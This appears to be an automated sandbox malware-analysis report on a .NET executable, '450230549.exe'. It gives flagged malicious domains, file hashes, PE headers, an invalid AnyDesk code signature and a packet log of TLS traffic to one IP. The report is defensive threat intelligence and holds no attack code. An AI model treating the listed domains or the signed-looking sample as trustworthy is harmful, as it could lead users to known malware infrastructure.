3b5074b1b5d032e5620f69f9f700ff0e | http://tiktok1688.cc/ | Get hash | malicious | Unknown | Browse | 162.159.134.233
3b5074b1b5d032e5620f69f9f700ff0e | https://qwekorqw-eqo.top/ | Get hash | malicious | Unknown | Browse | 162.159.134.233
3b5074b1b5d032e5620f69f9f700ff0e | https://qwoms-dei3.top/ | Get hash | malicious | Unknown | Browse | 162.159.134.233
3b5074b1b5d032e5620f69f9f700ff0e | http://cmn.pkgu192.vip/ | Get hash | malicious | Unknown | Browse | 162.159.134.233
3b5074b1b5d032e5620f69f9f700ff0e | http://frt.asan192.vip/ | Get hash | malicious | Unknown | Browse | 162.159.134.233
3b5074b1b5d032e5620f69f9f700ff0e | https://tiktokshopxx.top/ | Get hash | malicious | Unknown | Browse | 162.159.134.233
3b5074b1b5d032e5620f69f9f700ff0e | http://frt.msxd711.vip/ | Get hash | malicious | Unknown | Browse | 162.159.134.233
                              No context
                              Process:C:\Users\user\Desktop\450230549.exe
                              File Type:Unknown
                              Category:dropped
                              Size (bytes):847
                              Entropy (8bit):5.345615485833535
                              Encrypted:false
                              SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                              MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                              SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                              SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                              SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                              Malicious:true
                              Reputation:moderate, very likely benign file
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):6.490515014251841
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                              • Win32 Executable (generic) a (10002005/4) 49.96%
                              • Win16/32 Executable Delphi generic (2074/23) 0.01%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              • DOS Executable Generic (2002/1) 0.01%
                              File name:450230549.exe
                              File size:107'848 bytes
                              MD5:5086980f3ee0c035ec304102e6981410
                              SHA1:fca1625b36a002d77f69586f96744dfbcde1d472
                              SHA256:bfcef30ac8c0270957b3126d0b9046ddd4bc67fdffea077dd0a127809aa233a6
                              SHA512:baca4e5d7b1c7f4a7ddcf1ff2ba9876677a9ec43f5a4f6f985f55225b6d59ddb50bb7da1609a91b2ba389796e42407164111d9268dbc6a930f8b180da6d8e2c2
                              SSDEEP:1536:YPDs/XKdUDp1lRzloawwPI7zwHPG72uu630VDxl7Hxij7wPTxq:YP4b1lFLwM9PG720EVDxlQjcPU
                              TLSH:E5B34B166AC5D705D9E87EF860F7012217B2BDC61630C28B2DB8B7588E72393EDC566C
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....I.............................N.... ........@.. ....................................`................................
                              Icon Hash:8f82989919951d01
                              Entrypoint:0x40e74e
                              Entrypoint Section:.text
                              Digitally signed:true
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0xA449B1F0 [Sat May 5 12:58:24 2057 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                              Signature Valid:false
                              Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                              Signature Validation Error:The digital signature of the object did not verify
                              Error Number:-2146869232
                              Not Before, Not After
                              • 12/02/2024 00:00:00 12/02/2025 23:59:59
                              Subject Chain
• CN=AnyDesk Software GmbH, O=AnyDesk Software GmbH, L=Stuttgart, S=Baden-Württemberg, C=DE
                              Version:3
                              Thumbprint MD5:E4E34304F4315A15A0BC0E413363721E
                              Thumbprint SHA-1:CA38CF219C8E9782A8CBBD76643D24E4F2D74B03
                              Thumbprint SHA-256:AF74DC88EF91477F8A93E5DA98B3C80ECD6CB6A10271DC6DC768EC3F34239BC0
                              Serial:030E330A8ED28347BDA3BB478E410D7C
                              Instruction
                              jmp dword ptr [00402000h]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe700 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x12000 | 0x83e8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x15400 | 0x5148 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1c000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xe6bf | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xc754 | 0xc800 | c094f9bd686d5b7b28df2388262d0f14 | False | 0.55212890625 | data | 6.171156178031321 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.sdata | 0x10000 | 0x1e8 | 0x200 | ba1a51c546597b8fdcb7d0154e4ab651 | False | 0.857421875 | data | 6.638446248926509 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x12000 | 0x83e8 | 0x8400 | 37bfb2adf08a7790d9ce6bdcc9f0ae0c | False | 0.2878196022727273 | data | 5.210626337188779 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1c000 | 0xc | 0x200 | c70b7482b129e12d54df7f5701eccbd1 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x121c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.5487588652482269
RT_ICON | 0x12628 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.37922138836772984
RT_ICON | 0x136d0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | | | 0.28060165975103735
RT_ICON | 0x15c78 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | | | 0.25614076523382145
RT_GROUP_ICON | 0x19ea0 | 0x3e | data | | | 0.7903225806451613
RT_VERSION | 0x19ee0 | 0x31c | data | | | 0.42839195979899497
RT_MANIFEST | 0x1a1fc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 26, 2024 09:18:53.063005924 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:53.063055038 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.063131094 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:53.097182989 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:53.097204924 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.605844975 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.605990887 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:53.610922098 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:53.610938072 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.611340046 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.659261942 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:53.693247080 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:53.739401102 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.828139067 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.828355074 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.828408003 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:53.828422070 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.828552961 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.828603983 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:53.828609943 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.828756094 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.828811884 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:53.828818083 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.828917027 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.828974009 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:53.828979015 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.832915068 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.832976103 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:53.832982063 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.877991915 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:53.878005028 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.919140100 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.919244051 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:53.919253111 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.919379950 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.919434071 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:53.919440031 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.919611931 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.919681072 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:53.919687033 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.919785976 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.919841051 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:53.919846058 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.919974089 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.920022964 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:53.920027971 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.920517921 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.920577049 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:53.920581102 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.920635939 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.920665026 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.920684099 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:53.920692921 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.920734882 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:53.920825005 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.920890093 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.920937061 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.920955896 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:53.920962095 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.921005964 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:53.921010017 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.921665907 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.921700954 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.921725988 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:53.921732903 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:53.921777964 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:53.988008976 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.034240961 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:54.034249067 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.081114054 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:54.352169037 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.352369070 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.352425098 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:54.352442980 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.352570057 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.352619886 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:54.352631092 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.352675915 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.352735043 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:54.352741003 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.352812052 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:54.352818966 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.352844954 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.352874041 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:54.352936029 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.352998972 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:54.353004932 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.353051901 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:54.353051901 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.353072882 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.353120089 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:54.353168011 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.353233099 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:54.353266954 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.353324890 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:54.353370905 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.353420973 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:54.353528023 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.353640079 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:54.353646040 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.353672028 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.353693008 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:54.353707075 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.353728056 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:54.353873968 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.353933096 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:54.353939056 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.353982925 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:54.353984118 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.354006052 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.354044914 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:54.354095936 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.354157925 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:54.354162931 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.354192019 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.354212046 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:54.354217052 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.354239941 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:54.354299068 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.354357958 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:54.354362965 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.354389906 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.354415894 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:54.354422092 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.354444027 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:54.357009888 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.357079029 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
Sep 26, 2024 09:18:54.357084036 CEST | 443 | 49731 | 162.159.134.233 | 192.168.2.4
Sep 26, 2024 09:18:54.357136965 CEST | 49731 | 443 | 192.168.2.4 | 162.159.134.233
                              Sep 26, 2024 09:18:54.357477903 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.357544899 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.357573032 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.357639074 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.357711077 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.357774973 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.358278036 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.358342886 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.358378887 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.358437061 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.358478069 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.358536005 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.361936092 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.362008095 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.362131119 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.362206936 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.362541914 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.362606049 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.362637997 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.362700939 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.362754107 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.362814903 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.363466978 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.363526106 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.363667965 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.363729000 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.363759995 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.363856077 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.364473104 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.364547014 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.364583015 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.364665985 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.364763975 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.364830017 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.365514994 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.365576982 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.365735054 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.365803957 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.365847111 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.365902901 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.365932941 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.365991116 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.366619110 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.366678953 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.366740942 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.366792917 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.366862059 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.366918087 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.368752003 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.368769884 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.368813992 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.368829966 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.368839025 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.368887901 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.369906902 CEST44349731162.159.134.233192.168.2.4
